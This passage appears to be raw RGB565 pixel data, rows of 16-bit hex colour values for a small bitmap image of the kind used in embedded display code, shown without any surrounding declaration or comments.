0xe7ff, 0xf7ff, 0xfffe, 0xffdd, 0xffbc, 0xffdd, 0xffff, 0xf7ff, 0xffff, 0xf7bd, 0x4d7b, 0x0b94, 0x23f6, 0xcfdf, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xffff,
0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xdfff, 0x4cb5, 0x1393, 0x5d19, 0xefff, 0xffdf, 0xfffe, 0xfffe, 0xffde, 0xffff, 0xf7df, 0xffff, 0xf7ff, 0xdfff, 0x43f6, 0x4bb5, 0xf7ff, 0xffbc, 0xffbc, 0xf7df, 0xefff, 0x4b30, 0x6c13, 0xf7ff, 0xfffd, 0xfffe, 0xffbe, 0xffff, 0xffff, 0xefde, 0xefff, 0xe7ff, 0xa6ff, 0x1b54, 0x2bd7, 0xaeff, 0xefff, 0xffdd, 0xfffe, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7dd, 0xe7ff, 0x9ede, 0x1b54, 0x1b72, 0xbf9f, 0xe7bf, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7de, 0xf7ff, 0xefff, 0x19aa, 0x9578, 0xf7ff, 0xffff, 0xfffe, 0xffde, 0xffdf, 0xffff, 0xffbf, 0xffdf, 0xffff, 0xffff, 0xffbe, 0xf7ff, 0xe7ff, 0x54f7, 0x0b53, 0x5c97, 0xe7ff, 0xefdf, 0xfffe, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffde, 0xf7ff, 0x9ebd, 0x13b5, 0x1bf6, 0xaf7f, 0xf7ff, 0xbe7b, 0x11ad, 0x09f0, 0x53f4, 0xefff, 0xd73e, 0x11ac, 0x7c12, 0xefff, 0xa63d, 0x00a5, 0xb619, 0xefff, 0xd7df, 0x0928, 0x8474, 0xf7ff, 0xa5fb, 0x0168, 0xa619, 0xf7ff, 0x9517, 0x118e, 0x01ef, 0x8559, 0xefff, 0xd7ff, 0x4497, 0x1373, 0x6d79, 0xefff, 0xf7ff, 0xf7df, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xefff, 0x7db9, 0x1352, 0x3415, 0xcfff, 0xefff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe7bf, 0x8d99, 0x1250, 0x1293, 0x1293, 0x1a70, 0x95da, 0xe7ff, 0xffdf, 0xffdf, 0xffdf, 0xffde, 0xffff, 0xffff, 0xffbf, 0xffde, 0xefff, 0xcfff, 0x3436, 0x1354, 0x7dfb, 0xdfff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7fe, 0x5d5a, 0x1b53, 0x4477, 0xd7ff, 0xefff, 0xf7bd, 0xffde, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffd, 0xffdd, 0xfffe, 0xefbe, 0xc6bb, 0x6413, 0xbefd, 0xbedc, 0xbedd, 0xb67d, 0xb6bd, 0xae7b, 0xb6bc, 0xbedd, 0xbebd, 0xbebb, 0xb658, 0xc679, 0xc6dd, 0x4bf4, 0xafbf, 0x1437, 0x1b31, 0xa63b, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xfffe, 0xf7fc, 0xf7ff, 0xaefe, 0x1b74, 0x1354, 0xaf5f, 0xefff, 0xf7de, 0xfffe, 0xffde, 0xffff, 0xf7ff, 0xefff, 0xa61b, 0x3aae, 0x9557, 0xefff, 0xfffe, 0xffde, 0xffff, 0xf7df, 0xe7ff, 0xae19, 0x42ed, 0x9d58, 0xf7ff, 0xf7ff, 0xeffe, 0xf7fe, 0xffde, 0xffde, 0xefde, 0xefff, 0xc7ff, 0x4cd8, 0x23b5, 0x4455, 0xdfff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff,
0xf7ff, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xfffe, 0xe7ff, 0x75da, 0x1393, 0x3c35, 0xdfff, 0xf7df, 0xffff, 0xf7ff, 0xeffd, 0xffdd, 0xf7ff, 0xdfbf, 0x7cf5, 0x5c54, 0x5cb9, 0x2356, 0x4bd6, 0xffff, 0xff7b, 0xfffd, 0xf7ff, 0xefff, 0x4b0f, 0x7433, 0xefff, 0xfffd, 0xffde, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0xefff, 0xefbf, 0xf7ff, 0x8e1c, 0x1375, 0x1bb6, 0xd7ff, 0xfffd, 0xffbc, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffbf, 0xfffe, 0xeffe, 0xcfff, 0x23b3, 0x1377, 0xae7c, 0xefff, 0xf7ff, 0xffde, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe7ff, 0x64f8, 0x02b2, 0x2291, 0xcf5f, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xefff, 0xcfff, 0x3c75, 0x1375, 0x8e1b, 0xefde, 0xfffd, 0xf7de, 0xf7df, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffde, 0xffff, 0xbf7f, 0x1b94, 0x1375, 0xaf3f, 0xf7ff, 0xf7fe, 0xc73f, 0x1a93, 0x1ab4, 0x5c37, 0xefff, 0xd75f, 0x21ed, 0x83f3, 0xe7ff, 0xaedf, 0x19ca, 0xadf9, 0xe7ff, 0xcfbf, 0x118c, 0xa559, 0xf7ff, 0xa65f, 0x0a0d, 0xae9c, 0xf7ff, 0x8d7b, 0x0a94, 0x02b4, 0x859c, 0xf7df, 0xfffe, 0xd7df, 0x23d3, 0x13b5, 0x8e7f, 0xf7ff, 0xfffe, 0xfffd, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0xffff, 0xffdf, 0xf7ff, 0xbf5f, 0x1373, 0x1bd5, 0xbf7f, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xefff, 0x5c55, 0x0230, 0x1b57, 0x1358, 0x1358, 0x1356, 0x0250, 0x5cb8, 0xffff, 0xffdf, 0xffdf, 0xf7ff, 0xf7ff, 0xf7fe, 0xffde, 0xffff, 0xf7ff, 0xe7ff, 0xc7df, 0x2b72, 0x2373, 0xa73f, 0xefff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffde, 0xf7ff, 0xefff, 0x9e7b, 0x03b6, 0x2bd3, 0xdfff, 0xf7fe, 0xfffe, 0xfffe, 0xffdd, 0xffbd, 0xffbd, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffbf, 0xffdf, 0xbe5a, 0x9dda, 0x9e19, 0x74f3, 0x7d36, 0x8518, 0x95ba, 0xd79f, 0x7494, 0x8537, 0x7d16, 0x7d15, 0xe7ff, 0xb5f8, 0xb5fb, 0x95ba, 0x9ebe, 0xa75f, 0x2b93, 0x2b52, 0xc7bf, 0xefff, 0xffde, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffbf, 0xffdf, 0xffdf, 0xf7de, 0xf7ff, 0xc7ff, 0x2bb3, 0x2372, 0x8e3d, 0xefff, 0xffff, 0xffdd, 0xfffd, 0xf7de, 0xefff, 0xc71e, 0x432f, 0x5bd2, 0xdf5f, 0xf7df, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xf7ff, 0xeffe, 0xf7ff, 0xe79f, 0x7434, 0x3acf, 0xae9d, 0xe7ff, 0xefff, 0xffff, 0xffbe, 0xf7ff, 0xefff, 0xf7ff, 0xd7ff, 0x3c57, 0x1393, 0x75fa, 0xe7ff, 0xffff, 0xffbe, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff,
0xf7fe, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xffde, 0xffff, 0xaf1e, 0x1bf5, 0x0b73, 0xc7df, 0xefbf, 0xffdf, 0xffff, 0xf7ff, 0xf7fe, 0xfffe, 0xefff, 0xe7ff, 0x53d1, 0x4351, 0x3395, 0x12f5, 0x4bf7, 0xffff, 0xffdd, 0xfffe, 0xe7ff, 0xe7ff, 0x42cf, 0x7433, 0xefff, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0xf7ff, 0xffdf, 0xffff, 0xe7ff, 0x553a, 0x0bb6, 0x5d59, 0xe7ff, 0xfffe, 0xffbe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7be, 0xe7ff, 0x6556, 0x1353, 0x555f, 0xffff, 0xf7bf, 0xf7df, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xfffe, 0xffdf, 0xffbf, 0xffbf, 0xf7ff, 0xb6fd, 0x0270, 0x0399, 0x0ab4, 0x43b4, 0xefff, 0xffff, 0xffdf, 0xf7df, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xfffe, 0xffbe, 0xffdf, 0xe7ff, 0xb77f, 0x0397, 0x2393, 0xd79e, 0xfffe, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffde, 0xfffe, 0xfffe, 0xfffe, 0xfffd, 0xffbd, 0xf7ff, 0xe7ff, 0x3c56, 0x13b6, 0x75dd, 0xefff, 0xfffc, 0xfffe, 0xb6ff, 0x0274, 0x0a95, 0x6457, 0xefff, 0xdf9f, 0x220e, 0x8c35, 0xe7ff, 0xb77f, 0x09c9, 0xae3a, 0xe7ff, 0xbf5f, 0x118d, 0xad7b, 0xf7ff, 0x963f, 0x022f, 0xaebe, 0xefff, 0x7d5b, 0x02b7, 0x0294, 0x7d9c, 0xf7ff, 0xff7a, 0xfffe, 0xa73f, 0x0375, 0x1bf6, 0xdfff, 0xf79d, 0xfffe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xdfdf, 0x4455, 0x0333, 0x96ff, 0xefff, 0xffbd, 0xfffe, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdd, 0xfffe, 0xefff, 0x5458, 0x0af7, 0x0b7a, 0x0359, 0x0379, 0x0358, 0x0af5, 0x4c9a, 0xfffe, 0xffff, 0xffdf, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xefff, 0x963b, 0x1b74, 0x2bf6, 0xdfff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0xf7ff, 0xfffe, 0xffff, 0xffdf, 0xffbe, 0xfffe, 0xf7ff, 0xd7ff, 0x1b73, 0x0bd7, 0x9f1f, 0xeffe, 0xfffd, 0xffde, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xffdf, 0xffdf, 0xf7df, 0xb67c, 0x9578, 0xcf5e, 0xaebb, 0xb6fd, 0xae7e, 0xb6be, 0xdfbf, 0xb69b, 0xae7c, 0xb6de, 0xa67b, 0xdfbf, 0xdefc, 0xf79f, 0x84f6, 0xaf1e, 0xe7ff, 0x861c, 0x1375, 0x44b9, 0xdfff, 0xf7fe, 0xffde, 0xf7be, 0xf7ff, 0xf7ff, 0xffdf, 0xffbf, 0xffdf, 0xffff, 0xf7df, 0xf7ff, 0x4dbf, 0x0b33, 0x6538, 0xe7ff, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xe79e, 0x5b8f, 0x432d, 0xcf3d, 0xf7ff, 0xf7ff, 0xffff, 0xffde, 0xffde, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xefff, 0xdf9f, 0x4b4f, 0x4b0e, 0xd75e, 0xf7ff, 0xf7df, 0xffff, 0xfffe, 0xfffd, 0xf7ff, 0xbfbf, 0x1bd5, 0x0352, 0xb7bf, 0xf7ff, 0xfffe, 0xffde, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xf7fe, 0xffff, 0xffff,
0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xdfff, 0x54f8, 0x0b73, 0x8ebf, 0xe7ff, 0xffde, 0xffdf, 0xf7df, 0xf7ff, 0xf7dd, 0xfffe, 0xf7ff, 0xefff, 0xf7ff, 0xefdf, 0xdfff, 0x43f7, 0x4c16, 0xf7ff, 0xffdf, 0x4aec, 0xb75f, 0xdfff, 0x4b10, 0x7413, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffde, 0xffff, 0xf7fe, 0xefff, 0xcfff, 0x3416, 0x1394, 0xaf9f, 0xefff, 0xffbc, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffbe, 0xffff, 0xb73f, 0x1b72, 0x3416, 0xc7ff, 0xffbe, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffbe, 0xffff, 0xf7ff, 0x3331, 0x1335, 0x0338, 0x1339, 0x0272, 0x9e5c, 0xefff, 0xffff, 0xf7bf, 0xf7df, 0xffff, 0xffff, 0xf7de, 0xffff, 0xffff, 0xffde, 0xffdf, 0xf7ff, 0xe7ff, 0x669f, 0x1372, 0x5cb5, 0xdfff, 0xefff, 0xffff, 0xffdf, 0xffbe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xffdd, 0xffbd, 0xe7ff, 0x8ebf, 0x1373, 0x4456, 0xdfff, 0xefff, 0xffdb, 0xfffe, 0xb6ff, 0x0ad5, 0x0ad6, 0x6457, 0xf7ff, 0xdf9f, 0x1250, 0x94b6, 0xdfff, 0xaf5f, 0x120a, 0xa618, 0xefff, 0xd7bf, 0x094c, 0xa57a, 0xefff, 0xa6bf, 0x0a2f, 0xaebd, 0xefff, 0x859c, 0x0296, 0x0a93, 0x7d9b, 0xf7ff, 0xfffc, 0xffbc, 0xe7ff, 0x5ddd, 0x0373, 0x6d99, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7fe, 0xfffd, 0xffbe, 0xf7ff, 0x75bd, 0x0b74, 0x5d7a, 0xdfff, 0xf7ff, 0xffdf, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xfffd, 0xefff, 0x43f8, 0x0b39, 0x035a, 0x0378, 0x0398, 0x0358, 0x1337, 0x443a, 0xffdd, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xf7de, 0xe7ff, 0x4cf9, 0x1395, 0x8e3c, 0xf7ff, 0xffdf, 0xffde, 0xffde, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xfffe, 0xfffe, 0xffdf, 0xffff, 0xffde, 0xe7ff, 0x5d39, 0x0396, 0x6d9a, 0xdfff, 0xffff, 0xffde, 0xffff, 0xc6bc, 0xc69b, 0xbe5b, 0xcede, 0xbebe, 0xbede, 0xc69c, 0xd67c, 0xd67c, 0xf7ff, 0xae9e, 0xa5b9, 0xbebc, 0x95d9, 0x95d9, 0x9dfa, 0xa65c, 0xd7bf, 0x9d97, 0xa61a, 0x9dda, 0x9dfa, 0xdf9f, 0xffff, 0xffff, 0x84f5, 0xa71f, 0xfffd, 0xd7ff, 0x2418, 0x0b95, 0x8ebd, 0xefff, 0xffff, 0xffbf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xefff, 0xbede, 0x0398, 0x3c37, 0xd7ff, 0xefff, 0xefff, 0xefdf, 0xffff, 0x73d0, 0x3a6a, 0xc6db, 0xf7ff, 0xffff, 0xffff, 0xf7de, 0xffff, 0xffbe, 0xfffd, 0xfffe, 0xffff, 0xffde, 0xfffe, 0xfffe, 0xf7de, 0xf7ff, 0xf7df, 0xffdf, 0xe6fd, 0x4a8d, 0x6c13, 0xcf1e, 0xffff, 0xff9c, 0xffdc, 0xffff, 0xefff, 0x865e, 0x13b4, 0x44b7, 0xdfff, 0xfffe, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xfffe, 0xffff, 0xffff,
0xfffe, 0xffff, 0xf7ff, 0xfffe, 0xfffd, 0xf7ff, 0x9eff, 0x1375, 0x3416, 0xdfff, 0xefff, 0xf7de, 0xf7bf, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xf7df, 0xfffe, 0xffdd, 0xf7ff, 0x43b2, 0x43d4, 0xefff, 0xef9f, 0x0968, 0x8e3e, 0xd7ff, 0x42f0, 0x7413, 0xefff, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffde, 0xfffe, 0xef9d, 0xefff, 0xeffe, 0xf7ff, 0x961b, 0x0b75, 0x3d3c, 0xdfff, 0xffdb, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xefff, 0x5cfa, 0x0b34, 0x96df, 0xefff, 0xffff, 0xf7be, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffbc, 0xfffd, 0xf7ff, 0x8d9b, 0x0a72, 0x1b78, 0x0b57, 0x0b39, 0x1357, 0x2b33, 0xdfdf, 0xffff, 0xf7df, 0xffff, 0xf7ff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xffbe, 0xffff, 0xf7be, 0xf7df, 0xcfff, 0x23b3, 0x13b4, 0x9f5f, 0xe7ff, 0xfffe, 0xffdd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdd, 0xfffd, 0xd7ff, 0x2458, 0x1bb4, 0xaebd, 0xf7ff, 0xefbe, 0xfffe, 0xffff, 0xbeff, 0x02b4, 0x02d5, 0x6476, 0xffff, 0xd75f, 0x0270, 0x9555, 0xdfff, 0xa71f, 0x09ca, 0xbeda, 0xf7ff, 0xefff, 0x196c, 0x9d58, 0xefff, 0xaebf, 0x09ee, 0xae9c, 0xefff, 0x8ddb, 0x0a74, 0x0a71, 0x8ddc, 0xefff, 0xfffe, 0xffdd, 0xf7ff, 0xc7df, 0x2c35, 0x0b71, 0xd7ff, 0xf7ff, 0xffdf, 0xffdf, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffdf, 0xf7ff, 0xf7ff, 0xffdc, 0xffdd, 0xdfdf, 0x1bf8, 0x0bb6, 0xbfdf, 0xffff, 0xffde, 0xf7ff, 0xffff, 0xffdd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0x5c59, 0x0295, 0x1336, 0x0af3, 0x0b14, 0x1335, 0x1293, 0x5c7a, 0xffff, 0xffde, 0xfffe, 0xf7ff, 0xf7ff, 0xffdf, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xffff, 0xefff, 0xbfff, 0x1394, 0x33f4, 0xcfff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffde, 0xffbd, 0xffff, 0xc77f, 0x2c15, 0x0419, 0xdfde, 0xffff, 0xffbf, 0xffdf, 0xdefc, 0x7432, 0x9dda, 0x9dfb, 0x9e3b, 0x8558, 0x9dfb, 0xadfb, 0xadb9, 0x8473, 0xb65b, 0xae9d, 0xa5fa, 0x9db9, 0x7cd6, 0x8517, 0x7d17, 0x7d16, 0x74d4, 0x8515, 0x84f6, 0x7cf7, 0x7cf7, 0xd75f, 0xffff, 0xf7ff, 0x8536, 0x9ebf, 0xfffd, 0xefff, 0x9f1f, 0x13d5, 0x2c34, 0xdfff, 0xffff, 0xffbf, 0xfffe, 0xffff, 0xffff, 0xffde, 0xfffe, 0xf7ff, 0xe7ff, 0x5cb7, 0x0376, 0x967e, 0xefff, 0xf7ff, 0xe7ff, 0xa63a, 0x326b, 0xa597, 0xf7ff, 0xf7ff, 0xffde, 0xffbd, 0xffbd, 0xffff, 0xffff, 0xffde, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffdf, 0xffbf, 0xffff, 0xffff, 0xa5d9, 0x4b2f, 0x94f5, 0xffff, 0xf7fe, 0xfffe, 0xffbe, 0xe7ff, 0x2c15, 0x1394, 0xa6ff, 0xefff, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xffff, 0xffff,
0xffdd, 0xf7ff, 0xf7ff, 0xffdd, 0xffdd, 0xe7ff, 0x4d1b, 0x0b96, 0x8e7e, 0xf7ff, 0xfffe, 0xf7ff, 0xf7ff, 0xffde, 0xffde, 0xffff, 0xffdf, 0xffff, 0xffff, 0xff9c, 0xff9c, 0xffff, 0x43b1, 0x43f3, 0xe7ff, 0xdf7f, 0x0989, 0x9e9f, 0xdfff, 0x42af, 0x7c33, 0xefff, 0xfffe, 0xffde, 0xffff, 0xffff, 0xffdf, 0xffde, 0xfffe, 0xffff, 0xefbf, 0xffff, 0xfffd, 0xe7ff, 0x1bd6, 0x03d8, 0xbfbf, 0xffdd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xbf3f, 0x1376, 0x2c39, 0xd7ff, 0xffdb, 0xf7de, 0xf7ff, 0xefde, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffdf, 0xffbc, 0xffdd, 0xe7ff, 0x12b3, 0x0b18, 0x1359, 0x1b15, 0x0b78, 0x0b58, 0x0272, 0x857b, 0xf7ff, 0xffbe, 0xffde, 0xffff, 0xffff, 0xffff, 0xf7df, 0xf7ff, 0xffff, 0xfffe, 0xffde, 0xffff, 0xf7ff, 0x8e7e, 0x0395, 0x4d9c, 0xdfff, 0xfffd, 0xffdd, 0xffde, 0xffff, 0xf7ff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffde, 0xfffe, 0xa73f, 0x03b7, 0x3cb8, 0xefff, 0xfffe, 0xffff, 0xf7fe, 0xf7ff, 0xb6de, 0x0ab3, 0x02d5, 0x6497, 0xffff, 0xd79f, 0x022f, 0xa5f5, 0xdfff, 0x9e7f, 0x098a, 0xd73c, 0xf7ff, 0xefdf, 0x21ac, 0x84d5, 0xefff, 0xbedf, 0x1a0e, 0xae3b, 0xefff, 0x9e1b, 0x1232, 0x12b2, 0x857a, 0xefff, 0xffff, 0xffff, 0xffff, 0xefff, 0x6d99, 0x13d4, 0x65dc, 0xefff, 0xffdf, 0xffde, 0xffff, 0xf7ff, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xfffd, 0xffff, 0x965d, 0x0bb7, 0x44fb, 0xe7ff, 0xffdb, 0xfffe, 0xefdf, 0xffff, 0xffdd, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffff, 0xdf5f, 0x32d1, 0x4416, 0x3bb3, 0x4bf3, 0x43d3, 0x3b94, 0x53d6, 0x3ab2, 0xdf1d, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xdfff, 0x5d18, 0x1b73, 0x86bf, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xffdd, 0xf7dd, 0xefff, 0x85da, 0x1374, 0x563f, 0xfffc, 0xffbe, 0xffdf, 0xffdf, 0xd6ba, 0xadd8, 0xe7ff, 0xe7ff, 0xaedd, 0x3b4e, 0x9dda, 0xe7df, 0xefff, 0xbebb, 0xae59, 0xbedb, 0x74b6, 0xdfdf, 0xd77f, 0xd79f, 0xcf5f, 0xcf9f, 0xd7bf, 0xd75f, 0xd77f, 0xd7bf, 0xc77f, 0xcfbf, 0xd75d, 0xe7df, 0x6411, 0xaf1f, 0xffff, 0xf7df, 0xdfff, 0x3c76, 0x13b3, 0x9f1f, 0xf7ff, 0xffbe, 0xffdd, 0xf7fe, 0xf7ff, 0xfffe, 0xfffe, 0xf7ff, 0xb79f, 0x23b5, 0x2394, 0xdfff, 0xffff, 0xffff, 0xae7b, 0x1a4b, 0xdfff, 0xefff, 0xefff, 0xffff, 0xffff, 0xffbe, 0xffff, 0xffff, 0xefdf, 0xffff, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xefff, 0x3b0f, 0x7d37, 0xf7ff, 0xff9c, 0xffdc, 0xf7ff, 0x96be, 0x1374, 0x54d8, 0xe7ff, 0xf7fe, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff,
0xfffe, 0xf7ff, 0xf7ff, 0xfffe, 0xfffe, 0xdfff, 0x0b76, 0x1c38, 0xcfff, 0xffdd, 0xfffe, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xfffe, 0xf7ff, 0xffdf, 0xffbf, 0xffbe, 0xf7ff, 0x43f4, 0x4c14, 0xe7ff, 0xe7bf, 0x118a, 0x9e5f, 0xe7ff, 0x52f0, 0x7412, 0xefff, 0xffde, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffde, 0xffdc, 0xefff, 0x65bc, 0x0b76, 0x863e, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0x7dfc, 0x0b76, 0x6e5f, 0xe7ff, 0xfffa, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffde, 0xf7ff, 0x6cd7, 0x02b5, 0x033a, 0x0b58, 0x1b55, 0x0b57, 0x0b78, 0x0b17, 0x1a91, 0xd79f, 0xffff, 0xffde, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xfffe, 0xffff, 0xffdf, 0xffdc, 0xc7bf, 0x1c59, 0x0bb5, 0xd7ff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xf7ff, 0x657a, 0x0375, 0x8edf, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xbf1f, 0x0293, 0x02b5, 0x7d5b, 0xf7ff, 0xc71e, 0x0a4e, 0xc697, 0xe7ff, 0x859f, 0x11ac, 0xefff, 0xffff, 0xf7ff, 0x3aaf, 0x6c53, 0xefff, 0xcf5f, 0x2a0e, 0xa5ba, 0xefff, 0xa69d, 0x1251, 0x02b4, 0x857a, 0xffff, 0xf7df, 0xf7ff, 0xffde, 0xf7de, 0xcfff, 0x13b5, 0x2c99, 0xd7ff, 0xfffe, 0xffde, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7fe, 0xdfff, 0x4475, 0x1395, 0xa71f, 0xefff, 0xffdc, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7bf, 0xffff, 0xffff, 0x5b71, 0x9e1b, 0xdfff, 0x9df8, 0xefff, 0xe7ff, 0x9ddb, 0xe7ff, 0xa5fc, 0x6391, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xb6fe, 0x1333, 0x2cbc, 0xf7ff, 0xffff, 0xf7df, 0xf7ff, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffde, 0xfffd, 0xf7fe, 0xdfff, 0x3c15, 0x1b74, 0xafff, 0xfffe, 0xffff, 0xf7df, 0xffff, 0xcedb, 0xb5f8, 0xa597, 0x326b, 0xe7ff, 0x6cb5, 0xe7ff, 0x430e, 0x74b4, 0xc71e, 0xa618, 0xf7ff, 0x95b8, 0x8515, 0x9557, 0x9d98, 0x8d58, 0x95ba, 0x8537, 0xa5d8, 0x9556, 0x8537, 0x7d79, 0x8599, 